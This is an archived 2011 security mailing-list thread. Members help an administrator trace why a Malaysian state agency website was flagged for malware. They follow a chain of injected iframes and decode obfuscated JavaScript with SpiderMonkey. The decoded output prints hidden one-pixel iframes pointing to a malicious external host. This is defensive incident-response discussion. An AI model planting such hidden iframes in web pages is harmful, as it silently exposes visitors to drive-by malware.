[Owasp-Malaysia] Malware Detected!

Rasta Boy rastaboyz at gmail.com
Tue Feb 8 22:12:13 EST 2011


Thanks Adnan

On Wed, Feb 9, 2011 at 10:37 AM, Adnan bin Mohd Shukor <adnan.shukor at gmail.com> wrote:

> Hi,
>
> For further action :)
>
> http://25yearsofprogramming.com/blog/20070705.htm
>
> Thanks
>
> On 9 February 2011 10:36, Rasta Boy <rastaboyz at gmail.com> wrote:
> > Syamsuri, nice to hear that. Can you share your blog address?
> >
> > Adnan good work. Hope to learn more from you.
> >
> > On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >>
> >> Mr Adnan, thanks for the info and guide..
> >>
> >> I have cleaned all the mess and the site is up and running again..
> >>
> >> thanks to all too..
> >>
> >> ** I will blog this so others can use it as a guide...
> >>
> >> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor <adnan.shukor at gmail.com> wrote:
> >>>
> >>> mamp <= LOL typo.. it should be nano
> >>> js <= one of the binaries in SpiderMonkey. get the patched version
> >>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
> >>> working on MacOS/Darwin, apply this patch
> >>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
> >>>
> >>> thanks
> >>>
> >>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan <sharuzzaman at gmail.com> wrote:
> >>> > I can see 2 interesting apps/scripts:
> >>> >
> >>> > 1. mamp
> >>> > 2. /opt/analysis/js/js
> >>> >
> >>> > care to share? hopefully it is open source ;)
> >>> >
> >>> >
> >>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor <adnan.shukor at gmail.com> wrote:
> >>> >>
> >>> >> Here is my bash history:
> >>> >>
> >>> >> xanda:tmp adnan$ history
> >>> >> <snip>
> >>> >>  500  cd /tmp
> >>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
> >>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
> >>> >>  503  nano indexsedc.php
> >>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
> >>> >>  505  mamp indexsedc.php.1
> >>> >>  506  nano indexsedc.php.1
> >>> >>  507  wget http://www2.pkink.gov.my/sedc.php
> >>> >>  508  nano sedc.php
> >>> >>  509  wget http://www2.pkink.gov.my/default.php
> >>> >>  510  nano default.php
> >>> >>  511  nano default.php
> >>> >>  512  clear
> >>> >> <I've removed the tags and left the clean JavaScript inside>
> >>> >>  513  mv default.php default.txt
> >>> >>  514  /opt/analysis/js/js < default.txt
> >>> >>  515  cat write.log
> >>> >>  516  history
> >>> >> xanda:tmp adnan$
> >>> >>
> >>> >> Below is the output of the cat:
> >>> >> [output]
> >>> >> xanda:tmp adnan$ cat write.log
> >>> >> <iframe width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"<iframe width="1" height="1" src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA=="></iframe>"
> >>> >> [/output]
> >>> >>
> >>> >>
> >>> >> Hint: you might use a modified version of SpiderMonkey to 'understand'
> >>> >> the JavaScript
> >>> >>
> >>> >> Thanks
> >>> >>
> >>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >>> >> > thanks for the info..
> >>> >> > I will check all the files.
> >>> >> >
> >>> >> > How did you find it?
> >>> >> >
> >>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor <adnan.shukor at gmail.com> wrote:
> >>> >> >>
> >>> >> >> Here is the flow:
> >>> >> >>
> >>> >> >> 1) your indexsedc.php has an iframe to sedc.php
> >>> >> >> 2) and your sedc.php has an iframe to default.php
> >>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
> >>> >> >> actually create an iframe to
> >>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >>> >> >>
> >>> >> >> thanks :)
> >>> >> >>
> >>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >>> >> >> > can you point...
> >>> >> >> > my index.htm or indexsedc.php or other file?
> >>> >> >> >
> >>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor <adnan.shukor at gmail.com> wrote:
> >>> >> >> >>
> >>> >> >> >> you have iframe pointed to
> >>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
> >>> >> >> >>
> >>> >> >> >> which is not xss :)
> >>> >> >> >>
> >>> >> >> >> From my personal point of view, it's either caused by:
> >>> >> >> >> 1) malware on the PC which has been used for FTP/access to the server
> >>> >> >> >> 2) a compromised server
> >>> >> >> >>
> >>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
> >>> >> >> >> mycert at mycert.org.my for further analysis :)
> >>> >> >> >>
> >>> >> >> >> thanks
> >>> >> >> >>
> >>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >>> >> >> >> > I have checked it.
> >>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com> wrote:
> >>> >> >> >> >>
> >>> >> >> >> >> Hi Mohd Syamsuri,
> >>> >> >> >> >>
> >>> >> >> >> >> Why don't you check on the reason why it's being blocked, it might help.
> >>> >> >> >> >>
> >>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
> >>> >> >> >> >>
> >>> >> >> >> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
> >>> >> >> >> >>
> >>> >> >> >> >> Regards,
> >>> >> >> >> >> Kishur
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >>
> >>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> >>> >> >> >> >>>
> >>> >> >> >> >>> Assalamualaikum and good day to my fellow friends.
> >>> >> >> >> >>> I need some advice.
> >>> >> >> >> >>> The web site of Perbadanan Kemajuan Iktisad Negeri Kelantan
> >>> >> >> >> >>> (http://www.pkink.gov.my) has been blocked by Google for almost 4 days.
> >>> >> >> >> >>> It said that we host malware on our server: "Malware Detected!" (Google said that!!)
> >>> >> >> >> >>> What I did is..
> >>> >> >> >> >>> 1. Scan all the data and upload new data
> >>> >> >> >> >>> 2. Check the index.html or index.php
> >>> >> >> >> >>> 3. Scan using the web scanners at
> >>> >> >> >> >>> http://www.avgthreatlabs.com/
> >>> >> >> >> >>> http://www.virustotal.com
> >>> >> >> >> >>> but still get blocked..
> >>> >> >> >> >>> Google said: Suspected injected code
> >>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php" NAME="confcontent" scrolling=yes >
> >>> >> >> >> >>> I have been using this code for almost 2 years.
> >>> >> >> >> >>> What should I do now?
> >>> >> >> >> >>>
> >>> >> >> >> >>> --
> >>> >> >> >> >>> best regard
> >>> >> >> >> >>> syamsuri
> >>> >> >> >> >>>
> >>> >> >> >> >>>
> >>> >> >> >> >>>
> >>> >> >> >> >>> _______________________________________________
> >>> >> >> >> >>> Owasp-Malaysia mailing list
> >>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
> >>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
> >>> >> >> >> >>>
> >>> >> >> >> >>> OWASP Malaysia Wiki
> >>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
> >>> >> >> >> >>>
> >>> >> >> >> >>> OWASP Malaysia Wiki Facebook
> >>> >> >> >> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
> >>> >> >> >> >>
> >>> >> >> >> >
> >>> >> >> >> >
> >>> >> >> >> >
> >>> >> >> >> > --
> >>> >> >> >> > best regard
> >>> >> >> >> > syamsuri
> >>> >> >> >> >
> >>> >> >> >
> >>> >> >> >
> >>> >> >> >
> >>> >> >> > --
> >>> >> >> > best regard
> >>> >> >> > syamsuri
> >>> >> >> >
> >>> >> >
> >>> >> >
> >>> >> >
> >>> >> > --
> >>> >> > best regard
> >>> >> > syamsuri
> >>> >> >
> >>> >
> >>> >
> >>> >
> >>> > --
> >>> > Sharuzzaman Ahmat Raslan
> >>> >
> >>
> >>
> >>
> >> --
> >> best regard
> >> syamsuri
> >>
>